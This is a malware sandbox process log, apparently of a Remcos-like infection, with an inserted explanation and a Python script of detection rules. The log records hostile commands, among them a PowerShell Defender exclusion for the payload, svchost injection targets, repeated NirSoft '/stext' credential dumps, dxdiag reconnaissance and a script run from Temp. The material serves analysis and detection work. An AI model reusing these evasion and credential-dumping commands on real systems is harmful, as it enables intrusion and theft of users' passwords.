Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1996,i,9861328130371480487,5472941936562496665,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1980,i,14451717029141036046,9817444519185968189,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1980,i,13194812879482372137,17589311234174251836,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1980,i,4041789208375361090,5104077722080206453,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1900,i,964775095578921725,9120990377794690672,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs"
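The process tree above carries several indicators worth turning into detection logic: powershell.exe invoked with Add-MpPreference -ExclusionPath to exclude the payload from Defender; svchost.exe started by a binary in the user profile, with no -k service group, which is the injection target (a legitimate svchost is a child of services.exe and always names its group); the persisted copy of itself run with /stext, the save-as-text switch of the NirSoft password-recovery tools that Remcos is known to bundle for its credential-theft commands; dxdiag.exe /t writing a system-information dump to Temp; wscript.exe running a .vbs from Temp; and chrome.exe opened by svchost.exe with the .NET Framework shim's SHIM_NOVERSION_FOUND link (processName=svchost.exe), which indicates managed code running inside that svchost and failing to find its runtime. The following Python is an added example, not part of the Joe Sandbox report or of Remcos: the rule names are mine, the events are constructed from the report's lines plus one benign services.exe launch for contrast, and it assumes telemetry that supplies parent image, image and command line per process start (Sysmon Event ID 1 or Security 4688 with command-line auditing).

```python
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class ProcEvent:
    """One process-start record in the shape of Sysmon Event ID 1 / Security 4688."""
    parent: str    # image path of the creating process
    image: str     # image path of the created process
    cmdline: str   # full command line of the created process


# Constructed sample events modelled on the report's "Process created" lines,
# plus one benign services.exe -> svchost.exe launch for contrast.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Users\user\Desktop\iGhDjzEiDU.exe",
              r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
              r'Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iGhDjzEiDU.exe"'),
    ProcEvent(r"C:\Users\user\AppData\Roaming\Graias\graias.exe",
              r"C:\Windows\SysWOW64\svchost.exe", "svchost.exe"),
    ProcEvent(r"C:\Users\user\AppData\Roaming\Graias\graias.exe",
              r"C:\Windows\SysWOW64\dxdiag.exe",
              r'"C:\Windows\System32\dxdiag.exe" /t C:\Users\user\AppData\Local\Temp\sysinfo.txt'),
    ProcEvent(r"C:\Users\user\AppData\Roaming\Graias\graias.exe",
              r"C:\Users\user\AppData\Roaming\Graias\graias.exe",
              r'C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\rlggdon"'),
    ProcEvent(r"C:\Users\user\AppData\Roaming\Graias\graias.exe",
              r"C:\Windows\SysWOW64\wscript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs"'),
    ProcEvent(r"C:\Windows\SysWOW64\svchost.exe",
              r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument '
              r"http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409"
              r"&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7"
              r"&isServer=0&shimver=4.0.30319.0"),
    ProcEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\svchost.exe -k netsvcs -p"),
]


def _name(path: str) -> str:
    """Lower-cased file name of a Windows image path (works on any host OS)."""
    return PureWindowsPath(path).name.lower()


def _in_user_profile(path: str) -> bool:
    return path.lower().startswith("c:\\users\\")


def evaluate(ev: ProcEvent) -> list:
    """Return the names of every rule the event triggers (empty list if benign)."""
    hits = []
    image, parent, cmd = _name(ev.image), _name(ev.parent), ev.cmdline.lower()
    # Defender exclusion added from the command line (path, process or extension).
    if image in ("powershell.exe", "pwsh.exe") and re.search(
            r"add-mppreference\s+.*-exclusion(path|process|extension)", cmd):
        hits.append("defender_exclusion_added")
    # svchost.exe is only ever started by services.exe, and always with "-k <group>";
    # a bare "svchost.exe" from a user-profile binary is a hollowing/injection target.
    if image == "svchost.exe":
        if parent != "services.exe":
            hits.append("svchost_unexpected_parent")
        if " -k " not in f" {cmd} ":
            hits.append("svchost_without_service_group")
    # NirSoft "save as text" switch: credential dump to a file.
    if "/stext" in cmd:
        hits.append("nirsoft_stext_dump")
    # Script host executing a script dropped in %TEMP%.
    if image in ("wscript.exe", "cscript.exe") and "\\appdata\\local\\temp\\" in cmd:
        hits.append("script_host_from_temp")
    # dxdiag /t dumps hardware/OS inventory to a file; from a user-profile parent it is recon.
    if image == "dxdiag.exe" and re.search(r"\s/t\s", cmd) and _in_user_profile(ev.parent):
        hits.append("dxdiag_sysinfo_dump")
    # .NET shim error page launched by svchost: managed code ran inside that process.
    if parent == "svchost.exe" and "shim_noversion_found" in cmd and "processname=svchost.exe" in cmd:
        hits.append("dotnet_shim_error_from_svchost")
    return hits


def scan(events) -> dict:
    """Map each triggered rule name to the indexes of the events that triggered it."""
    findings = {}
    for i, ev in enumerate(events):
        for rule in evaluate(ev):
            findings.setdefault(rule, []).append(i)
    return findings


if __name__ == "__main__":
    for rule, idx in scan(SAMPLE_EVENTS).items():
        print(f"{rule}: events {idx}")
```

The two svchost rules are the ones that separate this tree from noise: a real svchost.exe has services.exe as its parent and a -k group on its command line, so either condition alone is worth an alert, and together with a parent under C:\Users they are near-certain injection. The /stext and dxdiag rules will also fire on administrators using the NirSoft tools or dxdiag by hand, so in production they belong at a lower severity or correlated with the rest of the chain.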
Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iGhDjzEiDU.exe"
Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Process created: C:\Users\user\Desktop\iGhDjzEiDU.exe "C:\Users\user\Desktop\iGhDjzEiDU.exe"
Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Process created: C:\Users\user\Desktop\iGhDjzEiDU.exe "C:\Users\user\Desktop\iGhDjzEiDU.exe"
Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Process created: C:\Users\user\AppData\Roaming\Graias\graias.exe "C:\Users\user\AppData\Roaming\Graias\graias.exe"
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Graias\graias.exe"
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Users\user\AppData\Roaming\Graias\graias.exe "C:\Users\user\AppData\Roaming\Graias\graias.exe"
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\System32\dxdiag.exe" /t C:\Users\user\AppData\Local\Temp\sysinfo.txt
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\epwvcdsubpgsncdkmqhibndmvhurqgg"
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\epwvcdsubpgsncdkmqhibndmvhurqgg"
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\epwvcdsubpgsncdkmqhibndmvhurqgg"
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\orbocvcopxyxxqzovbukeapdendakrxtoq"
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\rlggdon"
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\rlggdon"
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs"
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2000,i,13104816673025473941,13422850102401617178,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2052,i,5101334319077942357,3031038982098258924,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1748 --field-trial-handle=2016,i,6952115490064793543,9344193390170368015,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1980,i,6037255309931644860,773684642686352873,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1988,i,6741851451867710431,3176181943120798108,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1984,i,6477219484691926715,17097649623628388741,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1908 --field-trial-handle=1956,i,397094272896585161,9213667926170046926,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1984,i,15953286615006375795,524760772625708092,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1896,i,8025100827868505226,8846340673771724363,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1164 --field-trial-handle=1988,i,14003735333465884459,4249736709750483152,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1996,i,9861328130371480487,5472941936562496665,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
